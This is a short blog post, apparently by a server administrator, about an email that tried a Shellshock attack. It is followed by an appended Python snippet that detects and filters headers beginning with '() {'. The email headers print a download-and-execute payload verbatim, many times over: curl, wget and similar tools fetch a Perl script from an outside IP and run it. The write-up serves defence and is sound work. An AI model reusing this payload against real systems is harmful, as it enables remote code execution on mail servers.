October 24th, 2014

gul

A curious attempt to get a shell

I received this email:

Received: from u16850951.onlinehome-server.com [74.208.184.251]
        by happy.kiev.ua with smtp (Exim 4.80.1)
        id 1XhihW-0005vz-Lr
        for root@localhost; Fri, 24 Oct 2014 20:30:59 +0300
To: {: ;, };, /bin/sh-c'/bin/sh-c'cd/tmp;, curl-sO178.254.31.165/ex.txt;,
        lwp-download http:  //178.254.31.165/ex.txt;,
        wget178.254.31.165/ex.txt;, fetch178.254.31.165/ex.txt;, perlex.txt
        ;, rm-frex.*'&'&;
References: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Cc: {: ;, };, /bin/sh-c'cd/tmp;, curl-sO178.254.31.165/ex.txt;,
        lwp-download http:  //178.254.31.165/ex.txt;,
        wget178.254.31.165/ex.txt;, fetch178.254.31.165/ex.txt;, perlex.txt
        ;, rm-frex.*'&;
Bcc: {: ;, };, /bin/sh-c'cd/tmp;, curl-sO178.254.31.165/ex.txt;,
        lwp-download http:  //178.254.31.165/ex.txt;,
        wget178.254.31.165/ex.txt;, fetch178.254.31.165/ex.txt;, perlex.txt
        ;, rm-frex.*'&;
From: {: ;, };, /bin/sh-c'cd/tmp;, curl-sO178.254.31.165/ex.txt;,
        lwp-download http:  //178.254.31.165/ex.txt;,
        wget178.254.31.165/ex.txt;, fetch178.254.31.165/ex.txt;, perlex.txt
        ;, rm-frex.*'&;
Subject: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Date: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Message-ID: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Comments: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Keywords: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Resent-Date: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Resent-From: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;


You too should consider whether anything from the message body is being passed as a parameter to some mail transport component (a spam filter, an autoresponder, procmail, a logger, etc.). And if it is, whether that happens safely.

Those who wish can download and study the Perl script on their own.
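One way to run the check suggested above, as an added example that is not part of the original post: find headers whose value begins with the bash function-definition marker `() {` and keep them out of the environment handed to a helper program. The `MAIL_*` variable names and the sample message are constructed for illustration.

```python
import re
from email import message_from_string

# A vulnerable bash treated an environment value beginning with "() {" as a
# function definition. The pattern tolerates extra whitespace to stay conservative.
FUNC_DEF = re.compile(r"^\s*\(\)\s*\{")
FOLD = re.compile(r"\r?\n[ \t]+")
CONTROL = re.compile(r"[\x00-\x1f\x7f]")

def unfold(value):
    """Join folded header continuation lines into one logical line."""
    return FOLD.sub(" ", str(value)).strip()

def suspicious_headers(raw_message):
    """Return the names of headers whose unfolded value starts with '() {'."""
    msg = message_from_string(raw_message)
    return [name for name, value in msg.items() if FUNC_DEF.match(unfold(value))]

def child_env(raw_message, wanted=("Subject", "From", "Message-ID")):
    """Build environment variables for a helper (filter, autoresponder).

    Hypothetical MAIL_* naming. Values matching the marker are dropped and
    control characters are removed from the rest.
    """
    msg = message_from_string(raw_message)
    env = {}
    for name in wanted:
        value = msg.get(name)
        if value is None:
            continue
        value = unfold(value)
        if FUNC_DEF.match(value):
            continue  # never export a value bash could parse as a function
        env["MAIL_" + name.upper().replace("-", "_")] = CONTROL.sub("", value)
    return env

# Constructed sample message with a harmless command after the marker.
SAMPLE = (
    "From: alice@example.org\n"
    "Subject: () { :; }; echo constructed-sample\n"
    "Message-ID: () { :; };\n"
    "        echo constructed-sample\n"
    "Date: Fri, 24 Oct 2014 20:30:59 +0300\n"
    "\n"
    "body\n"
)

if __name__ == "__main__":
    print(suspicious_headers(SAMPLE))
    print(child_env(SAMPLE))
```

Filtering like this is defence in depth: the primary fixes remain a patched bash and passing message data to helpers through stdin or files rather than the environment or a shell command line.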